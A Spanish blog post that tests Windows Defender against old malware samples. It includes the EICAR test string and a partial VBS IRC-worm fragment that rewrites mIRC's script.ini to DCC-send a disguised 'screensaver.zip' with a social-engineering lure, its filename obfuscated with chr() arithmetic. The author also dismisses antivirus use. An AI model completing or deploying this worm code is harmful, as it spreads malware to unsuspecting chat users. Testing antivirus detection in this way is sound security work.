¿Necesitas antivirus con Windows 10?

Mucho se ha comentado de que con Windows 10 no necesitas un antivirus porque incluye a Windows Defender.

Windows Defender es un programa que hace de antivirus en Windows 10 y que viene instalado y activado de manera predeterminada, así que para salir de la duda decidí ponerlo a prueba.

WindowsDefender

Para probar al tan mencionado Windows Defender me di a la tarea de buscar algunas muestras de código malintencionado que datan entre 2001 y 2005, por lo que cualquier antivirus debería detectarlas. He aquí los resultados:

EICAR Antivirus Test File

El primer archivo a probar fue el EICAR, este archivo es inofensivo y lo usan todos los antivirus para probar que tan bien están funcionando. En el caso de Windows Defender apenas creado el archivo se recibe una alerta de amenaza detectada.

eicarOK

El comando para crear el archivo fue el siguiente (en la consola de comandos):

echo X5O!P%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*>%USERPROFILE%\eicar32.exe

W32/Gedbot.A

Gedbot.A es un Gusano/Downloader reportado en el año 2004, la copia que tengo no fue detectada por Windows Defender. Incluso le di “Botón derecho -> propiedades” y no lo detectó, sólo me faltó ejecutarlo, pero no lo iba a hacer en mi máquina.

gedbot

 

Mapson

Mapson es una pequeña familia de virus escrita por Falckon, ex miembro del grupo de escritores de virus Gedzac. La primera variante de Mapson (Mapson.A) apareció en junio del 2003, en ese entonces Falckon era miembro activo del grupo.

Windows defender reconoció ambas variantes con las que hice pruebas (Mapson.A y Mapson.D)

Mapson

Heurística

En los productos antivirus se conoce como heurística a las técnicas que emplean para reconocer códigos maliciosos (virus, gusanos, troyanos, etc.) que no se encuentren en su base de datos (ya sea porque son nuevos, o por no ser muy divulgados).

Entre mis curiosidades tengo varios códigos que en VBS que otros antivirus reconocen como “posible amenaza”, básicamente por contener códigos muy parecidos al virus I-Love-You. Por ejemplo, un archivo VBS con este código debería ser detectado por heurística, pero Windows Defender no detecta nada:

on error resume next
dim irc, ini, f,mirc
set irc = fzo.getfolder("c:\mirc\")
if irc = "" then
 f = r (THISS & "Software\Microsoft\Windows\CurrentVersion\programfilesdir")
 set irc = fzo.getFolder(f & "\mirc")
end if
if irc <> "" then
 set ini = fzo.createTextFile(irc & "\script.ini",2,false)
 ini.write("[scr")
 ini.write("ipt]")
 ini.write (vbcrlf)
 ini.write(";mIR")
 ini.writeline("C Script")
 ini.WriteLine("; Please dont edit this script... mIRC will corrupt.")
 ini.writeline(";http://www.mirc.com")
 ini.write("n0=on")
 ini.write(" 1:JOIN:")
 ini.writeline("#:{")
 ini.write("n1= ")
 ini.write("/if ( ")
 ini.write("nick =")
 ini.write("= " & " me")
 ini.writeline(" ) { halt " & chr(125))
 ini.WriteLine("n2= /.privmsg $nick Este protector de pantalla es la envidia de todos mis cuates, checalo, me dices que tal.")
 ini.write("n3=")
 ini.write(" /.dcc " & chr(120-5) & chr(100 + 1) & "nd")
 ini.writeLine(" " & chr(34) & chr(88-10) & chr(125-20) & chr(70-3) & chr(90+17) & " " & s32 & "\screensaver.zip")
 ini.writeline("n4=}")
 ini.Close
end if

Se debe detectar como W32/IRC-Worm.gen o bien como “Possible IRC Worm”

Futuras muestras

Iré actualizando este post con otras muestras de viruses. Estoy seguro que por ahí tengo guardados los siguientes:

  • Klez
  • Sasser
  • Blaster
  • MyDoom
  • Carmina
  • I Love You
  • Sircam
  • Daduni

Y para probar con virus más recientes, usaré los binarios de algunos programas de la empresa italiana Hacking Team.

Conclusiones

Saca tú tus propias conclusiones, a mí en lo personal no me gusta tener instalada una solución de seguridad en mi equipo, más que nada porque tengo binarios de virus reales y no quiero que me sean eliminados.

Las soluciones de seguridad (Antivirus, Firewall, etc) creo que son sobre todo enfocadas al usuario común, aquellos que todavía le dan clic a los anuncios de “Ganaste un viaje a Orlando” o a aquellos que todavía se descargan archivos adjuntos de su correo aun cuando no los solicitaron.

Anuncios

Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s